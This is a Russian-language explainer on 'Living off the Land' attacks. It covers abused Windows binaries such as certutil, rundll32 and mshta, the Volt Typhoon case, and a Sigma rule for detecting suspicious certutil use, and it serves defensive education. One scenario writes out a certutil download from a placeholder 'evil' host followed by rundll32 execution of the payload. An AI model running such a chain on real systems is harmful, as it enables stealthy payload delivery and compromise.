
51
Living off the Land (LOTL) – это когда атакующий не тащит в систему кастомный малварный бинарник, а работает штатными, подписанными Microsoft/вендором тулзами: PowerShell, WMI, certutil, rundll32, bitsadmin, mshta, psexec и т.д. По данным Vectra AI, такие атаки задействованы в 84% high-severity инцидентов, а PowerShell светится в 71% всех LOTL-кейсов. Логика простая: раз бинарь подписан и легитимен, EDR/антивирус его не палит как “малварь” – палит только поведение, а поведение легко замаскировать под админскую рутину.
Каталогизация давно есть под каждую платформу:
LOLBAS-проект уже задокументировал больше 200 windows-бинарей, пригодных для абьюза, и список постоянно растёт.
Топ LOLBins и как их разворачивают против системы
| Бинарь | Легитимная функция | Как абьюзят | MITRE ID |
|---|---|---|---|
| PowerShell | Администрирование, автоматизация | In-memory execution, кража кредов, no-file payload | T1059.001 |
| WMI/WMIC | Удалённое управление, инвентаризация | Удалённый запуск процессов, persistence | T1047 |
| certutil.exe | Работа с сертификатами | Скачивание файлов, base64-кодирование пейлоада | T1105 |
| rundll32.exe | Запуск функций из DLL | Proxy-execution вредоносной DLL | T1218.011 |
| mshta.exe | Запуск HTA-приложений | Исполнение HTA с удалённого URL | T1218.005 |
| bitsadmin | Фоновая передача файлов | Скрытая доставка второго стейджа | T1197 |
Источник таблицы – разбор SentinelOne.
Классический сценарий: атакующий пишет через certutil -urlcache -split -f http://evil/payload.b64 out.txt, декодит base64 тем же certutil, а дальше через rundll32.exe payload.dll,EntryPoint запускает код прямо в памяти. Ни один файл не палится как “exe с подписью Kaspersky detected” – потому что это два родных виндовых бинаря, просто скормленных не по назначению.
Реальный кейс: Volt Typhoon
Гос-спонсируемая группа Volt Typhoon (КНР) – эталонный пример боевого применения LOTL против критической инфраструктуры США. CISA прямо пишет: группа использует hands-on-keyboard активность и нативные системные инструменты (LOLBins) для закрепления и расширения доступа в сетях жертв, полностью избегая дропа кастомного малваря. Ключевой инструмент из их арсенала – злоупотребление ntdsutil.exe для дампа базы Active Directory, а также WMI для латерального движения.
Что важно: даже “хвостовые” side-tools вроде Earthworm (туннелирование) и Mimikatz (креды) детектятся сигнатурно, а вот сама LOTL-часть цепочки – нет, потому что там просто системные вызовы. Это и есть суть метода: малварь нужна только там, где без неё реально никак, а весь основной путь – через доверенные бинари.
Как это детектить (раз уж ты на защитной стороне)
Голыми сигнатурами LOTL не ловится – нужна поведенческая аналитика. Рабочий базовый стек логов:
CommandLine, а не только имя процесса.Пример Sigma-логики (псевдокод) для детекта подозрительного certutil:
|
1 2 3 4 5 6 7 8 9 |
detection: selection: Image|endswith: '\certutil.exe' CommandLine|contains: - '-urlcache' - '-decode' - '-encode' condition: selection level: high |
То же самое правило можно клонировать под bitsadmin, mshta, regsvr32 – паттерн один: белый бинарь + нетипичные для него флаги/аргументы.
Практические выводы для защиты
certutil со скачиванием, mshta с внешним URL.